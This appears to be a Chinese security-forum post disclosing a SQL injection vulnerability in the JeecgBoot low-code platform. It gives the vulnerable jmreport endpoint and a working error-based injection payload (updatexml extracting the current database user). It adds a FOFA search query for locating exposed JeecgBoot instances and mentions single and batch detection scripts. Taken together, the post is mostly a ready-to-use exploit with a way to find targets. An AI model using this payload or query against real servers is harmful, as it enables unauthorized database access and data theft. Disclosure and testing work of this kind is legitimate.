JEECG-BOOT SQL注入漏洞[附POC] 漏洞披露


JEECG-BOOT简介

JeecgBoot是基于BPM的低代码平台,采用前后端分离架构,搭建于SpringBoot 2.x、SpringCloud、Ant Design&Vue、Mybatis-plus、Shiro、JWT等技术栈,支持微服务。其强大的代码生成器实现前后端代码一键生成,助力低代码开发。JeecgBoot引领新低代码开发模式:OnlineCoding->代码生成器->手工MERGE,帮助Java项目解决70%的重复工作,让开发更专注于业务,快速提高效率,节省研发成本,同时保持灵活性。拥有一系列低代码能力,包括Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计等。

漏洞描述

SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要原因在于web应用程序在接收相关数据参数时未进行有效过滤,直接将其带入数据库查询,使攻击者有可能拼接执行构造的SQL语句。

漏洞复现

图片[1]-JEECG-BOOT SQL注入漏洞[附POC] 漏洞披露-山海云端论坛

URL:

plaintextCopy code

/jeecg-boot/jmreport/qurestSql

POST数据:

jsonCopy code

{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

检测脚本

FOFA语句:

plaintextCopy code

title=="JeecgBoot 企业级低代码平台"

单个检测

图片[2]-JEECG-BOOT SQL注入漏洞[附POC] 漏洞披露-山海云端论坛

批量检测

图片[3]-JEECG-BOOT SQL注入漏洞[附POC] 漏洞披露-山海云端论坛

脚本获取方式

JEECG-BOOT SQL注入漏洞[附POC] 漏洞披露-山海云端论坛
隐藏内容,输入密码后查看
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容